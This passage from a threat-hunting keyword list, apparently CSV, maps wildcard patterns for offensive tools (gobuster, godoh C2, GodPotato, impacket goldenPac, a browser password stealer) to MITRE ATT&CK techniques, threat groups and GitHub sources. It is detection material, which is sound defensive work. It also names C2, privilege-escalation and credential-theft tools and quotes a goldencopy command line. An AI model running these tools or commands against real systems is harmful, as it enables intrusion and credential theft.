T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,1,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -*gobfuscate*,offensive_tool_keyword,gobfuscate,When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. This makes a lot of information difficult or impossible to decipher from the binary.,T1027 - T1029 - T1059,TA0002 - TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/unixpickle/gobfuscate,1,0,N/A,N/A,10,1362,190,2021-12-07T22:27:26Z,2016-10-01T20:40:37Z -*gobuster dir *,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster dir -w *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*gobuster dns*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster fuzz -*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster gcs *,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster s3 *,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster tftp *,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster vhost -u *,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster vhost*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster*,offensive_tool_keyword,gobuster,Gobuster is a tool used to brute-force,T1110 - T1114 - T1115 - T1107,TA0001 - TA0007,N/A,N/A,Exploitation tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster_*.tar.gz*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobuster_*.zip*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobusterfuzz*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gobustertftp*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*gocrack@password.crackers.local*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,1,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,1,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*GodFault.exe*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*GodFault\GodFault*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*godoh -*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh agent*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh c2*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh help*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh receive*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh send*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh test*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,0,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh-darwin64*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh-linux64*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh-windows32.*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*godoh-windows64.*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*go-donut/*.exe*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*go-donut/*.go*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*GodPotato -*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotato.cs*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,0,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*godpotato.exe*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotato.git*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotatoContext.cs*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,0,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotato-master.zip*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotato-NET*.exe*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*GodPotatoUnmarshalTrigger.cs*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,0,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*go-external-c2*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*GoFetchAD/GoFetch*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,1,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*GoFetch-master*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,1,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*gohaleygoandhackawaythegibson*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*golang_c2-master*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,1,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*golden_ticket.py*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*golden_ticket.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*goldencopy * --password * --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*GoldenGMSA.exe*,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,1,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*GoldenGMSA-main*,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,1,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*goldenPac.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*goMatrixC2.go*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*goMatrixC2-main*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*GooDork*,offensive_tool_keyword,GooDork,GooDork is a simple python script designed to allow you to leverage the power of google dorking straight from the comfort of your command line. GooDork offers powerfull use of googles search directives. by analyzing results from searches using regular expressions that you supply,T1136 - T1560 - T1213,TA0011 - TA0007,N/A,N/A,Information Gathering,https://github.com/k3170makan/GooDork,1,0,N/A,N/A,2,123,39,2013-06-08T23:13:12Z,2012-03-16T22:40:40Z -*GoodSync Server*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,Service Name,9,10,N/A,N/A,N/A,N/A -*GoodSync-vsub-2Go-Setup.exe*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,1,portable version,9,10,N/A,N/A,N/A,N/A -*google-chrome/cookies.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome/credit_cards.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome/history.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome/login_data.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome\cookies.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome\credit_cards.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome\history.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-chrome\login_data.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*google-get-pdf-metadata *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*google-get-rootdomains *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*goPassGen-master*,offensive_tool_keyword,goPassGen,Easily-guessable Password Generator for Password Spray Attack,T1110 - T1110.003,TA0006 ,N/A,N/A,Exploitation 